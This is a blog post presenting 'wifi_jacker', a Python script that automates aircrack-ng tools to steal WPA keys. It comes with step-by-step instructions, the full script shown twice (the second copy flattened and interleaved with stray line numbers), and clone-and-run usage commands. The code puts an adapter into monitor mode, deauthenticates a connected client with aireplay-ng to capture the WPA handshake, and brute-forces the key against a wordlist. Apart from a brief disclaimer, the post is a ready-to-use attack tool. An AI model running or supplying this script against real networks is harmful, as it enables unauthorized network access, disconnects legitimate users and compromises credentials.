wifi_jacker – script for steals WPA keys.

ahm3ds / January 1, 2017 / Comments Off / Code Scripting, Penetration Test, Wireless/wifi

LEGAL DISCLAMER
The author does not hold any responsibility about the bad use of this script, remmember that attacking targets without prior concent its ilegal and punish by law, this script was build to show how resource files can automate tasks.

wifi_jacker is a quick program that (potentially) steals WiFi keys via brute force hats off to the guys who made aircrack-ng the success of this all depends on the strength of your password dictionary good WPA keys will be harder to crack.

**** TO GET WIFI KEYS: ****
STEP 0: put your wifi adapter into monitor mode.
STEP 1: find a router MAC, then hone in with said MAC
STEP 2: find a client connected to the target router
STEP 3: force client to re-connect and leak the 4-way handshake
STEP 4: pray to your deity of choice that step 3 works.
STEP 5: crack password found in step 3 using your password list Again, no guarantee that this works. Such is life/a reasonably strong WPA key.

**** INGREDIENTS: ****
+ Kali Linux/Backtrack, Linux Platform and aircrack-ng
+ a USB wifi adapter capable of entering monitor mode
+ a meaty password list (under this directory)
+ consent

TROUBLESHOOTING:
* this program assumes your USB wireless and minotor interfaces are named “wlan0” and “wlan0mon” respectively. change these accordingly.
* if it messes up half way through, you probably need to manually put your usb wifi interface back into managed mode with ‘sudo airmon-ng stop <name of monitor interface>’

Script:

import os, sys, re, time

'''
   README:
        this is a quick program that (potentially) steals WiFi keys via brute force
        hats off to the guys who made aircrack-ng
        the success of this all depends on the strength of your password dictionary
        good WPA keys will be harder to crack
                ****    INGREDIENTS:    ****
                + Kali Linux/Backtrack
                + a USB wifi adapter capable of entering monitor mode
                + a meaty password list (under this directory)
                + consent
                ****    TO GET WIFI KEYS:   ****
                 STEP 0: put your wifi adapter into monitor mode.
                 STEP 1: find a router MAC, then hone in with said MAC
                 STEP 2: find a client connected to the target router
                 STEP 3: force client to re-connect and leak the 4-way handshake
                 STEP 4: pray to your deity of choice that step 3 works.
                 STEP 5: crack password found in step 3 using your password list
                           Again, no guarantee that this works.
                           Such is life/a reasonably strong WPA key.
        This is probably full of bugs that I will never fix
    TROUBLESHOOTING:
        *this program assumes your USB wireless and minotor interfaces
            are named "wlan0" and "wlan0mon" respectively. change these accordingly.
        *if it messes up half way through, you probably need to manually put your usb
            wifi interface back into managed mode with 'sudo airmon-ng stop <name of monitor interface>'
'''


print(
    "       *__      _ _     _      _         _                  __   __*\n" +
    "       *\ \    / (_) __(_)  _ | |__ _ __| |_____ _ _  __ __/  \ / |*\n" +
    "        *\ \/\/ /| | _|| | | || / _` / _| / / -_) '_| \ V / () || |*\n" +
    "         *\_/\_/ |_|_| |_|  \__/\__,_\__|_\_\___|_|    \_/ \__(*)_|*\n\n\n")

class Wifi_Jacker:

    def __init__(self):
        self.mon_mode = False
        self.usb_int = "wlan0"
        self.mon_int = "wlan0mon"
        self.ap_MAC = None
        self.client = None
        self.wordlist = "rockyou.txt"
        self.welcome()


    def welcome(self):
        picd = True
        while picd:
            resp = input("*** please select an option ***\n\n" \
                         "1. put interface into monitor mode\n" \
                         "2. scan for router MACs\n" \
                         "3. hone in on a router/scan for clients\n" \
                         "4. force client deauth\n" \
                         "5. crack password\n"
                         "6. exit\n\n")
            try:
                resp = int(resp)
            except ValueError:
                pass
            if resp not in range(1,8):
                pass
            else:
                picd = False
        if resp == 1:
            if not self.mon_mode:
                self.monmode_config(1)
            else:
                print("\ninterface already in monitor mode\n")
                self.welcome()
        elif resp == 2:
            if self.mon_mode:
                self.r_scan()
            else:
                print("\ninterface must be in monitor mode to scan\n")
                self.welcome()
        elif resp == 3:
            self.check_bssid()
        elif resp == 4:
            if self.ap_MAC is not None:
                self.c_reconnect()
            else:
                print("please search for a target AP via option #3 first")
                self.welcome()
        elif resp == 5:
            if self.ap_MAC is not None:
                self.crack()
            else:
                print("please search for a target AP via option #3 first\nalso, make sure you have a captured WPA key before doing this...")
                self.welcome()
        elif resp == 6:
            if self.mon_mode:
                self.monmode_config(-1)
            os.system("sudo pkill airodump-ng && sudo pkill python3")  #this is stupid but it works
            print("BYE")
            sys.exit(0)

    def monmode_config(self, conf):
        try:
            if conf == 1:
                print("\nputting interface " + self.usb_int +" into monitor mode...")
                mon_up = os.system("sudo airmon-ng start " + self.usb_int)
                if mon_up == 0:
                    self.mon_mode = True
                else:
                    raise OSError
                print("interface now in monitor mode...\n")
                self.welcome()
            elif conf == -1:
                print("\nputting interface " + self.usb_int + " back into managed mode...")
                mon_down = os.system("sudo airmon-ng stop " + self.mon_int)
                if mon_down == 0:
                    self.mon_mode = False
                else:
                    raise OSError
        except OSError:
            print("something went wrong here. check your interface(s)")
            pass

    def r_scan(self):
        try:
            pid = os.fork()
            if pid > 0:
                os.system("sudo xterm -e airodump-ng " + self.mon_int)
                os.wait()
            self.welcome()
        except OSError:
            pass

    def check_bssid(self):
        picd = True
        while picd:
            bssid = input("please give the BSSID of the target AP (use '-' delimiter):")
            if re.match("[0-9a-f]{2}([-:])[0-9a-f]{2}(\\1[0-9a-f]{2}){4}$", bssid.lower()):
                picd = False
                chan = self.check_chan(True)
                self.ap_MAC = bssid
                self.hone(bssid, chan)
            else:
                print("invalid MAC")
                pass

    def c_reconnect(self):
        picd = True
        while picd:
            bssid = input("please give the MAC of a client connected to target AP (use '-' delimiter):")
            if re.match("[0-9a-f]{2}([-:])[0-9a-f]{2}(\\1[0-9a-f]{2}){4}$", bssid.lower()):
                picd = False
                bssid = bssid.replace(":", "-")
                self.client = bssid
                deez = self.check_chan(False)
                pid = os.fork()
                if pid > 0:
                    os.system("sudo xterm -e aireplay-ng -0 " + str(deez) + " -a "
                                + str(self.ap_MAC)
                                + " -c " + str(self.client) + " " + self.mon_int)
                    os.wait()
                print("*** IMPORTANT ***\n" \
                      "You now need to wait until you see 'WPA: <AP MAC>' \n"
                      "in the top right had corner of your honed-in airodump-ng screen,\n"
                      "this signifies that the 4-way handshake has been caught\n."
                      "If this doesn't happen within a reasonable timeframe, you:\n "
                      "1. Are shit out of luck,\n"
                      "     as the client has not re-connected for some reason.\n"
                      "     Try again with a different client.\n"
                      "2. Need to physically move closer to the target AP/client.")
                self.welcome()
            else:
                print("invalid client MAC")
                pass

    def check_chan(self, opt):
        picd = True
        while picd:
            if opt:
                chan = input("please specify channel #:")
            else:
                chan = input("please specify # of deauth packets to send (2 is good):")
            try:
                resp = int(chan)
                picd = False
                return resp
            except ValueError:
                pass

    def hone(self, bssid, chan):
        try:
            pid = os.fork()
            if pid > 0:
                bssid = bssid.replace(":", "-")
                self.ap_MAC = bssid
                os.system("sudo xterm -e airodump-ng -c "
                          + str(chan) +
                          " --bssid " + str(bssid) +
                          " -w ./ " + self.mon_int)
                os.wait()
            self.welcome()
        except OSError:
            print("something went wrong here. check your interface(s)")
            pass

    def crack(self):
        #assumes there is only one .cap file, but w/e
        k_type = input("what are we working with here? WEP, or WPA-PSK?")
        k_type = "1" if k_type == "WEP" else "2"
        try:
            pid = os.fork()
            if pid > 0:
                os.system("sudo aircrack-ng -a" + k_type + " -b " + self.ap_MAC +
                          " -w ./" + self.wordlist + " ./-01.cap > pword.txt")
                os.wait()
            print("cracking...")
            time.sleep(5)
            print("check 'pword.txt' for your password! no guarantees")
            self.welcome()
        except OSError as ose:
            print("something went wrong here:\n", ose)
            pass

if __name__ == "__main__":
 wj = Wifi_Jacker()

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

222

223

224

import os, sys, re, time

'''

README:

this is a quick program that (potentially) steals WiFi keys via brute force

hats off to the guys who made aircrack-ng

the success of this all depends on the strength of your password dictionary

good WPA keys will be harder to crack

**** INGREDIENTS: ****

+ Kali Linux/Backtrack

+ a USB wifi adapter capable of entering monitor mode

+ a meaty password list (under this directory)

+ consent

**** TO GET WIFI KEYS: ****

STEP 0: put your wifi adapter into monitor mode.

STEP 1: find a router MAC, then hone in with said MAC

STEP 2: find a client connected to the target router

STEP 3: force client to re-connect and leak the 4-way handshake

STEP 4: pray to your deity of choice that step 3 works.

STEP 5: crack password found in step 3 using your password list

Again, no guarantee that this works.

Such is life/a reasonably strong WPA key.

This is probably full of bugs that I will never fix

TROUBLESHOOTING:

*this program assumes your USB wireless and minotor interfaces

are named "wlan0" and "wlan0mon" respectively. change these accordingly.

*if it messes up half way through, you probably need to manually put your usb

wifi interface back into managed mode with 'sudo airmon-ng stop <name of monitor interface>'

'''

print(

" *__ _ _ _ _ _ __ __*\n" +

" *\ \ / (_) __(_) _ | |__ _ __| |_____ _ _ __ __/ \ / |*\n" +

" *\ \/\/ /| | _|| | | || / _` / _| / / -_) '_| \ V / () || |*\n" +

" *\_/\_/ |_|_| |_| \__/\__,_\__|_\_\___|_| \_/ \__(*)_|*\n\n\n")

class Wifi_Jacker:

def __init__(self):

self.mon_mode = False

self.usb_int = "wlan0"

self.mon_int = "wlan0mon"

self.ap_MAC = None

self.client = None

self.wordlist = "rockyou.txt"

self.welcome()

def welcome(self):

picd = True

while picd:

resp = input("*** please select an option ***\n\n" \

"1. put interface into monitor mode\n" \

"2. scan for router MACs\n" \

"3. hone in on a router/scan for clients\n" \

"4. force client deauth\n" \

"5. crack password\n"

"6. exit\n\n")

try:

resp = int(resp)

except ValueError:

pass

if resp not in range(1,8):

pass

else:

picd = False

if resp == 1:

if not self.mon_mode:

self.monmode_config(1)

else:

print("\ninterface already in monitor mode\n")

self.welcome()

elif resp == 2:

if self.mon_mode:

self.r_scan()

else:

print("\ninterface must be in monitor mode to scan\n")

self.welcome()

elif resp == 3:

self.check_bssid()

elif resp == 4:

if self.ap_MAC is not None:

self.c_reconnect()

else:

print("please search for a target AP via option #3 first")

self.welcome()

elif resp == 5:

if self.ap_MAC is not None:

self.crack()

else:

print("please search for a target AP via option #3 first\nalso, make sure you have a captured WPA key before doing this...")

self.welcome()

elif resp == 6:

if self.mon_mode:

self.monmode_config(-1)

os.system("sudo pkill airodump-ng && sudo pkill python3") #this is stupid but it works

print("BYE")

sys.exit(0)

def monmode_config(self, conf):

try:

if conf == 1:

print("\nputting interface " + self.usb_int +" into monitor mode...")

mon_up = os.system("sudo airmon-ng start " + self.usb_int)

if mon_up == 0:

self.mon_mode = True

else:

raise OSError

print("interface now in monitor mode...\n")

self.welcome()

elif conf == -1:

print("\nputting interface " + self.usb_int + " back into managed mode...")

mon_down = os.system("sudo airmon-ng stop " + self.mon_int)

if mon_down == 0:

self.mon_mode = False

else:

raise OSError

except OSError:

print("something went wrong here. check your interface(s)")

pass

def r_scan(self):

try:

pid = os.fork()

if pid > 0:

os.system("sudo xterm -e airodump-ng " + self.mon_int)

os.wait()

self.welcome()

except OSError:

pass

def check_bssid(self):

picd = True

while picd:

bssid = input("please give the BSSID of the target AP (use '-' delimiter):")

if re.match("[0-9a-f]{2}([-:])[0-9a-f]{2}(\\1[0-9a-f]{2}){4}$", bssid.lower()):

picd = False

chan = self.check_chan(True)

self.ap_MAC = bssid

self.hone(bssid, chan)

else:

print("invalid MAC")

pass

def c_reconnect(self):

picd = True

while picd:

bssid = input("please give the MAC of a client connected to target AP (use '-' delimiter):")

if re.match("[0-9a-f]{2}([-:])[0-9a-f]{2}(\\1[0-9a-f]{2}){4}$", bssid.lower()):

picd = False

bssid = bssid.replace(":", "-")

self.client = bssid

deez = self.check_chan(False)

pid = os.fork()

if pid > 0:

os.system("sudo xterm -e aireplay-ng -0 " + str(deez) + " -a "

+ str(self.ap_MAC)

+ " -c " + str(self.client) + " " + self.mon_int)

os.wait()

print("*** IMPORTANT ***\n" \

"You now need to wait until you see 'WPA: <AP MAC>' \n"

"in the top right had corner of your honed-in airodump-ng screen,\n"

"this signifies that the 4-way handshake has been caught\n."

"If this doesn't happen within a reasonable timeframe, you:\n "

"1. Are shit out of luck,\n"

" as the client has not re-connected for some reason.\n"

" Try again with a different client.\n"

"2. Need to physically move closer to the target AP/client.")

self.welcome()

else:

print("invalid client MAC")

pass

def check_chan(self, opt):

picd = True

while picd:

if opt:

chan = input("please specify channel #:")

else:

chan = input("please specify # of deauth packets to send (2 is good):")

try:

resp = int(chan)

picd = False

return resp

except ValueError:

pass

def hone(self, bssid, chan):

try:

pid = os.fork()

if pid > 0:

bssid = bssid.replace(":", "-")

self.ap_MAC = bssid

os.system("sudo xterm -e airodump-ng -c "

+ str(chan) +

" --bssid " + str(bssid) +

" -w ./ " + self.mon_int)

os.wait()

self.welcome()

except OSError:

print("something went wrong here. check your interface(s)")

pass

def crack(self):

#assumes there is only one .cap file, but w/e

k_type = input("what are we working with here? WEP, or WPA-PSK?")

k_type = "1" if k_type == "WEP" else "2"

try:

pid = os.fork()

if pid > 0:

os.system("sudo aircrack-ng -a" + k_type + " -b " + self.ap_MAC +

" -w ./" + self.wordlist + " ./-01.cap > pword.txt")

os.wait()

print("cracking...")

time.sleep(5)

print("check 'pword.txt' for your password! no guarantees")

self.welcome()

except OSError as ose:

print("something went wrong here:\n", ose)

pass

if __name__ == "__main__":

wj = Wifi_Jacker()

Usage:

git clone https://github.com/hannay1/WiFi_Jacker && cd WiFi_Jacker
sudo python2 wifi_jacker.py

1 2	git clone https://github.com/hannay1/WiFi_Jacker && cd WiFi_Jacker sudo python2 wifi_jacker.py

Source: https://github.com/hannay1

Tags: Brute Force, deauthentication

Archives

wifi_jacker – script for steals WPA keys.